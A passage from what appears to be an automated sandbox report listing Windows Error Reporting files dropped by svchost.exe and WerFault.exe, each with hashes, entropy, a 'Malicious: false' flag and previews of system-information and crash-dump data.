C:\ProgramData\Microsoft\Windows\WER\Temp\WER66DB.tmp.txt

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6872445421771904
Encrypted:	false
SSDEEP:	96:TiZYW9Zr6pYyYSW6LHFUYEZ9otDiG3G0S7wKXDarXeMa04Iz83:2ZDalhOZTarXeMa0fz83
MD5:	4147182887D5AC5B1D3816E96742C9FE
SHA1:	96FAA7D079D2CD9A8C5D835E551F700129B805D1
SHA-256:	5F72162961D8622AC5C1A74B2D3F4AD1B76243C0DFD908EA0AEFD437DB31BD5B
SHA-512:	B41B56E16A5098126E70F49F712BC3F08FAEDA28192D90FEE0F9D5E0B632E7DBF9244CAF01D43988FB5FA9BFE3565EA698EF2D3FE4C06CE845B29F5DBFF4FA5D
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9FD7.tmp.csv

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	80854
Entropy (8bit):	3.0766591212715992
Encrypted:	false
SSDEEP:	768:6LK5tTnYd1KUNPQxcKKpyUaMai+vLPIVCNVnnBAxgpOEmDV6Ib1:Nt7Yd1KceUHaiYLQVWVnygpTkV66
MD5:	D7918FAA4BC0424252015503A2C65B09
SHA1:	DC2F2F721F729BFB8EE06440AF46E8951489382F
SHA-256:	B3BE6E395D5BE2FE105DED48E70C83A4EDC0029CB323E6069A57ECD44CC73E6E
SHA-512:	DE48C941FC59377903A2D085A62FAB8C003869C6BEE7BE5937DD89B9B1306D585170C977D7F8605CB81A8EE625305AEB5CC3F13746B8492357AA1FCEAA9C58CA
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA297.tmp.txt

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.689491720199326
Encrypted:	false
SSDEEP:	96:TiZYWtLsnV3A3YeYeWfHhUYEZ2GtDiQ33lnS0wWuj5LraP76MYLiIB63:2ZDtN35YdhraP76MYLFB63
MD5:	3C3DFC940D0FCD0E59EDCE66BA0AE9CE
SHA1:	473ADF4EC043B446352351E304047E74E61C8F60
SHA-256:	477794974D58A5D84502D4A143FF96F5D4D0BF910230048978078256BC5C8715
SHA-512:	6A7238D5915FA2BA01BA28B8E7E2DE891438A19FE80BF9B3EF2731B39636F2DC607D36F89B8CEBE4D2B014C1A76D2A3F00B8E2C771085AEFB66D4602E563E743
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE2C0.tmp.dmp

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Fri Dec 22 20:12:30 2023, 0x1205a4 type
Category:	dropped
Size (bytes):	85968
Entropy (8bit):	1.882186787808816
Encrypted:	false
SSDEEP:	384:Vomd1Ob3zOHHHbBXS2SoiErWL1FPwZoOUoVQYJqYqlTYt:zDBXpCNLf4nJqYQQ
MD5:	8D9600873BA668BE5A6A22C4ABA9AD37
SHA1:	956B34C49051A994522F95B8B2875B6C5B073D36
SHA-256:	286C2BC0BF134C6EA58A2068F45E15E6DDE17D2510F703BF1185F70E9B063D53
SHA-512:	B0513A426B2FF95994C8B95E2A2536DCC5A7AAB9E0B60A81EA3433BFC2A4054415480607E2E84C04FC1C404D4C5309A400844B9217E26A8441401A727AA46A52
Malicious:	false
Preview:	MDMP..a..... .........e................................................D....@..........`.......8...........T............!...-......................................................................................................eJ......@.......GenuineIntel............T.............e............................. ..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE3DA.tmp.WERInternalMetadata.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8366
Entropy (8bit):	3.6876594212730316
Encrypted:	false
SSDEEP:	192:R6l7wVeJPw6L6Y9ASU+CYgmfXJUIpD989bImsfbs4m:R6lXJI6L6YaSU+CYgmfXJUHIFf+
MD5:	43E02B4A542EA7B0AEE63DBCC1E8A858
SHA1:	5089E45E66C4C7307100CB949992109A3DC01E22
SHA-256:	54B7D3BCA1D8A4559414A406D532F1F12C067358CE7315A6349561602F735426
SHA-512:	08A6BEEA119F1769C3F0290059899CC0D324AC3A1B022EB4EA790EBF4A74D901C27E0A809559F7B0492C460971748344406DEED957B85BCDE9EE653D3BBA2B54
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.4.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE419.tmp.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4728
Entropy (8bit):	4.431968580491988
Encrypted:	false
SSDEEP:	48:cvIwWl8zstJg77aI9rIWpW8VYUYm8M4J8dC1eFp+q8vvC1qR5BVfmjd:uIjfHI71h7V0JbuKgg5BVf4d
MD5:	22887D15C581D719998A55AE2419A498
SHA1:	6D264BE88CD00072E1A043223DE8DCEA16D5294C
SHA-256:	1189006C4C14AF8C20C0B8733D145DD6786C2C5927B108E6A2E2B2DD7D81C850
SHA-512:	5E8F40B04340E70134CA6702B8AC866EDE34500183B7D86DEDA6FFB1A94C4984632C7132DD3988FFEF96A227540B7B7BA7281876E011A53DB15B208CB0141A3A
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="115875" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE437.tmp.csv

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	81154
Entropy (8bit):	3.082262041779205
Encrypted:	false
SSDEEP:	768:Nv/L/VV0kXYIAdZxSp9wDq7Di0wclRodMYGiu2xZ1eP+HEDLQIXTl1:NpV0UAdZxSpHTRwMYGF2xbeTHT
MD5:	8753E6F428723C0C8DB0A481D2A7B6CA
SHA1:	A79AD8EF0A71474EFCEC8F3050283EF41F02B5A3
SHA-256:	622D3549CEB20F3544AA5377F85DAFE0E9EE11899DE73A3ED1F632461C80ACF5
SHA-512:	B8EDF2D246A3E0480F71DD80DDB480747D4C9C132C505ECECC6C9B6964038BA4EF32B19508DB3927FC6ADBBC61E34D94E40F3A1183D5863A17E6825690DAC63B
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE6B8.tmp.txt

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.685275984648714
Encrypted:	false
SSDEEP:	96:TiZYWSqbGZe1/ZCYuYwWoHRUYEZrnNtDicIY0rw0219awXuOMTP+IB83:2ZDvUJYy23awXuOMTPJB83
MD5:	97728C96CC96E22B1F4D1CAA07773091
SHA1:	27145045CD57256403C62961C7F3FCB3243DFA49
SHA-256:	A47A6D8100EEE454F3570F3A0983E937AB548DC37BB0A272B610C15F6DD75F81
SHA-512:	831461082A28D20AFE76F0E10D96A88F687FD901277BA2908EA7778F6E2C1EEB3EA05A17AAF3AFD7C0A31373FDD7AE68B2FA60CE24C16CDC900375D5350FE2E3
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE967.tmp.dmp

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Fri Dec 22 20:12:32 2023, 0x1205a4 type
Category:	dropped
Size (bytes):	362284
Entropy (8bit):	4.441569669914391
Encrypted:	false
SSDEEP:	3072:q/xzOBQ4uEqJa0YcQjBYwaWl+P8y2ovLTgyXLW94dOzeZ7:qpzOBQ4fdiP8y2gTg19f
MD5:	5FAF9BDABF5AF62E7B3574708343D474
SHA1:	57694B14DEEA8953FF37DB72F3E5CEC8E7EA2983
SHA-256:	BCC24DA4DE3CDE1F42E404FFE92DC25AED242C1FAB1819526BA8BDF61192A196
SHA-512:	C34C9AEA9C31C5A2B457D5FFD560B78B08091C17E94E4AAEB8BB21EFFAC3EDA7E84492654D7741C8BCEFC3313E6C11C66E3AEA51DD5B2F07DF2B8E8DA62C911D
Malicious:	false
Preview:	MDMP..a..... .........e........................p...........$...h$.......1...N..........`.......8...........T............5...Q...........$..........x&..............................................................................eJ.......'......GenuineIntel............T.............e............................. ..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREB2D.tmp.WERInternalMetadata.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8328
Entropy (8bit):	3.6946525358455546
Encrypted:	false
SSDEEP:	192:R6l7wVeJtr6B6Y9/ySUDfgmfQJfupr189b6asfRem:R6lXJx6B6YdySUDfgmfQJfh65fx
MD5:	E45E39A97E62BD3C2FF47ADFFA5517D7
SHA1:	EE40C599D6DF1C9AF875B1A9AFDB990ABB20B018
SHA-256:	19940FF63DBEC3E3D64BBC612BAE01A433504F8A8AB28778C6BAFD1D4C3CBC02
SHA-512:	BE1720103A6B22C8A1869C54E794FB57629F6A7704635F2E731D047FF8B806693ACB636E255EA4315DEDE6CC8B6DF889CB444569FD01E60927E8880ABB08329D
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.4.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREB6C.tmp.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4656
Entropy (8bit):	4.459777205181544
Encrypted:	false
SSDEEP:	48:cvIwWl8zstJg77aI9rIWpW8VY2NYm8M4JwqF/Q+q8VC5H8m0TZd:uIjfHI71h7V4Jw15Ht0Vd
MD5:	109357FEAE08D621FFA0EFB380BBAB5A
SHA1:	FBE33262D5CD44ACD6682B51CAF496F74B92F5DD
SHA-256:	B923DFCDD7EEB3693A6577BCA48AEBE20C8D506CDD7C8FC53B29C9A59890A1AA
SHA-512:	754D4EA8DE315451E0118B214BF4825B1FB4016EF60A2D7BD027DC20F449D954D1A3C57F0757187518C6DFC2F920566EE8C4F0F33A5646F1EB91C37B6B74F3BF
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="115875" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREB7C.tmp.csv

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	81504
Entropy (8bit):	3.081982981026474
Encrypted:	false
SSDEEP:	768:VspYUcrYv3dZ9FpTqDq7Di0LcORodPYugUpOLZ1McEDLQIoRQ:cf3dZ9FpTLpRwPYugwOLbMtYRQ
MD5:	E4E72D742B92A20A6483FA06D6486A14
SHA1:	4F01BCD407D4ABBEC4ECE1F364BB30FAD6446D47
SHA-256:	FC7F7D4910240BE276AF47B76AC2F4ABBF10D2C0692077B2779C5ABC761006FA
SHA-512:	B80D324537C20F8C93B9779A0A107D908CCD4476D11B9DDAA758B57575318A5A2A74F70573149DEBBCCECF3BD7BB26143191A4852DD74AB806C700EFD7C0DAA9
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREC0A.tmp.txt

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6851810444553688
Encrypted:	false
SSDEEP:	96:TiZYWvPI65Z/YMYSWvH3UYEZVwtDiHId0Dwh2+QNa5XRM8PuIH83:2ZDTPb1W2PNa5XRM8P5H83
MD5:	D4850FC6D29772940209291C06218804
SHA1:	8999CE0E2FCB3A3C3598C6A4EE138C1A4197B816
SHA-256:	0ACEDA9583BFC46ED595286C6287F5C8E05A56AB89D40AD56DCED58B3FBE4444
SHA-512:	C6B22235F49C8486FA165376061CD51AC68B48EFCBCD67580DC7CA4F2F5BA061935A8EF4621CB0495EBE4FCA260B8BFF09D7056060E06A1F16E741C352531F3C
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF1D3.tmp.dmp

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Fri Dec 22 20:12:34 2023, 0x1205a4 type
Category:	dropped
Size (bytes):	359008
Entropy (8bit):	4.460148501648669
Encrypted:	false
